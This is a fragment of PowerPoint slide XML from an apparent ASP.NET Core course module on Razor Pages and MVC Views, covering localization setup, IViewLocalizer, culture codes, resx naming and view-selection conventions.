          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>View shown in browser</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://localhost:26641/home/list</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7119682" y="2864575"/>
            <a:ext cx="3390900" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>View code generated through scaffolding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="185970220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Demo: Scaffolding Deep Dive – TTT and T4 Templates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198062059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Module 4: Razor Pages &amp; MVC Views</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section 4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Localization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8120320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Localization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>IViewLocalizer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> service provides localized strings for a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>view</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="402336" y="1828801"/>
            <a:ext cx="11447294" cy="3886200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18736881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Localization configuration </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configure service </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>services.AddLocalization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(options =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>options.ResourcesPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = "Resources");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configure default culture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>app.UseRequestLocalization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RequestLocalizationOptions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>            {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DefaultRequestCulture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RequestCulture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-US"),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                // Formatting numbers, dates, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SupportedCultures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>supportedCultures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                // UI strings that we have localized.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SupportedUICultures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>supportedCultures</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>            });</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create Resources folder in a project and all necessary resource files for all supported languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="127011428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Culture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{AFFF257A-30C5-4AFB-911B-BE4CEEA1EA82}" type="slidenum">
              <a:rPr lang="en-US" kern="0" smtClean="0"/>
              <a:pPr defTabSz="914400" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1800" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-US ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>US is a culture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alternative English cultures:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-AU	English - Australia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-BZ	English - Belize</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-CA	English - Canada</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-CB	English - Caribbean</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-IE	English - Ireland</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-JM	English - Jamaica</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-NZ	English - New Zealand</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-PH	English - Philippines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ZA	English - South Africa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-TT	English - Trinidad and Tobago</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-GB	English - United Kingdom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-US	English - United States</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ZW	English - Zimbabwe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336981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Localization mechanics </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402337" y="1143000"/>
            <a:ext cx="7903464" cy="4956048"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Localization of Index view of home Controller.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Full path to a view by default: Views/Home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Index.cshtml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Asp.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Core will automatically map view to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>resx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Views/Home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Index.cshtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Views.Home.Index.resx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Views.Home.Index.resx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> location for default language. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To additional language we need </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>additiona</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>resx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> files with similar name:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fur Russian language - Views.Home.Index.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>ru-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Ru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>.resx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can implement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>IViewLocalizer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> interface to realize another behavior.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B374FFF-30B0-455E-9A01-9BF585976D1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8332382" y="533400"/>
            <a:ext cx="3248692" cy="5334000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62816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Views</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select View using default convention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select a particular view</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select view from a different directory structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="7812"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1713732"/>
            <a:ext cx="4732945" cy="953268"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638801" y="1996211"/>
            <a:ext cx="3581400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Views &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Home &gt; About.cshtml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
